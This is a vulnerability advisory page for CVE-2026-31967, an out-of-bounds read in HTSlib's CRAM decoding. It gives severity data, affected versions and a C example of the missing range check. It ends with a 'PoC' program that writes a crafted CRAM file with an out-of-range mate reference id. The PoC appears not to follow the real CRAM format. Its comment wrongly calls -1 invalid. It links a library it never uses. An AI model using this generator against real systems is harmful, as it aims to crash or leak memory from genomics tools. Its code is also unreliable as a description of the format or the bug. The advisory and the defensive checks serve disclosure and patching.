Security Vulnerability Report
CVE-2026-31967 CVSS 9.1 CRITICAL

CVE-2026-31967

Published: 2026-03-18 20:16:21
Last Modified: 2026-03-19 14:36:35

Description

HTSlib is a library for reading and writing bioinformatics file formats. CRAM is a compressed format which stores DNA sequence alignment data. In the `cram_decode_slice()` function, called while reading CRAM records, the value of the mate reference id field was not validated. Later use of this value, for example when converting the data to SAM format, could result in out-of-bounds array reads when looking up the corresponding reference name. If the array value obtained also happened to be a valid pointer, it would be interpreted as a string and an attempt would be made to write the data as part of the SAM record. This bug may allow information about program state to be leaked. It may also cause a program crash through an attempt to access invalid memory. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue.
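The missing range check described above, as an added example; this is not HTSlib's code or its actual fix. The types, function names and sample data are hypothetical, and -1 is assumed to mean "no mate reference" (written as `*` in SAM).

```c
#include <stdint.h>
#include <stdio.h>

/* Hypothetical stand-ins for a header's reference table and a decoded
 * record; these are not HTSlib's types. */
typedef struct {
    int32_t n_refs;           /* number of reference sequences */
    const char **ref_names;   /* valid indices: 0 .. n_refs-1 */
} demo_header;

typedef struct {
    int32_t ref_id;
    int32_t mate_ref_id;      /* decoded from the file, so untrusted */
} demo_record;

/* Unsafe pattern: the decoded id indexes the array with no range check.
 * Shown for contrast only; main() never calls it. */
const char *mate_name_unchecked(const demo_header *h, const demo_record *r) {
    return r->mate_ref_id == -1 ? "*" : h->ref_names[r->mate_ref_id];
}

/* An id is acceptable if it is -1 (assumed "no reference") or in range. */
int ref_id_valid(const demo_header *h, int32_t id) {
    return id == -1 || (id >= 0 && id < h->n_refs);
}

/* Decode-time check: 0 = accept, -1 = reject the record as corrupt. */
int validate_record(const demo_header *h, const demo_record *r) {
    return (ref_id_valid(h, r->ref_id) && ref_id_valid(h, r->mate_ref_id)) ? 0 : -1;
}

/* Point-of-use check: returns NULL instead of reading past the table. */
const char *mate_name_checked(const demo_header *h, const demo_record *r) {
    if (!ref_id_valid(h, r->mate_ref_id)) return NULL;
    return r->mate_ref_id == -1 ? "*" : h->ref_names[r->mate_ref_id];
}

/* Constructed sample data: a header with two references. */
static const char *demo_names[] = { "chr1", "chr2" };
static const demo_header demo_hdr = { 2, demo_names };

int main(void) {
    demo_record good = { 0, 1 }, none = { 0, -1 }, bad = { 0, 0x7FFFFFFF };
    printf("good: %d %s\n", validate_record(&demo_hdr, &good), mate_name_checked(&demo_hdr, &good));
    printf("none: %d %s\n", validate_record(&demo_hdr, &none), mate_name_checked(&demo_hdr, &none));
    printf("bad:  %d %s\n", validate_record(&demo_hdr, &bad),
           mate_name_checked(&demo_hdr, &bad) ? "name" : "(rejected)");
    return 0;
}
```

Validating once at decode time keeps every later consumer safe; the point-of-use check is defence in depth for records built by other code paths.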

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:* (versions before 1.21.1) - VULNERABLE
cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:* (versions from 1.22 up to, but excluding, 1.22.2) - VULNERABLE
cpe:2.3:a:htslib:htslib:1.23:*:*:*:*:*:*:* - VULNERABLE
HTSlib < 1.21.1
HTSlib < 1.22.2
HTSlib < 1.23.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2026-31967 PoC - Malicious CRAM file generator
 * This PoC creates a minimal CRAM file with invalid mate_ref_id to trigger OOB read
 * Compile: gcc -o poc poc.c -lhts
 * Usage: ./poc malicious.cram
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* CRAM container header structure */
typedef struct {
    uint32_t magic;        /* 'CRAM' magic number */
    uint32_t version;      /* CRAM version (e.g., 3.1) */
    uint32_t length;       /* Container length */
    uint32_t num_blocks;   /* Number of blocks */
} cram_container_header_t;

/* CRAM slice header with crafted mate_ref_id */
typedef struct {
    uint32_t method;       /* Compression method */
    uint32_t ref_id;       /* Reference sequence ID */
    int32_t  mate_ref_id;  /* VULNERABILITY: Invalid mate_ref_id (e.g., -1 or large value) */
    uint32_t align_start;  /* Alignment start position */
    uint32_t align_end;    /* Alignment end position */
    uint32_t record_count; /* Number of records */
} cram_slice_header_t;

int create_malicious_cram(const char *filename)
{
    FILE *fp = fopen(filename, "wb");
    if (!fp) {
        fprintf(stderr, "Failed to create output file\n");
        return -1;
    }

    /* Write CRAM container header */
    cram_container_header_t container = {
        .magic = 0x4D415243,   /* bytes 'C','R','A','M' when written on a little-endian host */
        .version = 0x00030001, /* Version 3.1 */
        .length = sizeof(container) + sizeof(cram_slice_header_t),
        .num_blocks = 1
    };
    fwrite(&container, sizeof(container), 1, fp);

    /* Write slice header with MALICIOUS mate_ref_id */
    cram_slice_header_t slice = {
        .method = 1,
        .ref_id = 0,
        .mate_ref_id = 0x7FFFFFFF, /* INVALID: Out of bounds value */
        .align_start = 100,
        .align_end = 150,
        .record_count = 1
    };
    fwrite(&slice, sizeof(slice), 1, fp);

    fclose(fp);
    printf("Malicious CRAM file created: %s\n", filename);
    printf("Trigger: Load this file with htslib and convert to SAM format\n");
    return 0;
}

int main(int argc, char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <output.cram>\n", argv[0]);
        return 1;
    }
    return create_malicious_cram(argv[1]);
}

References

Raw JSON Data
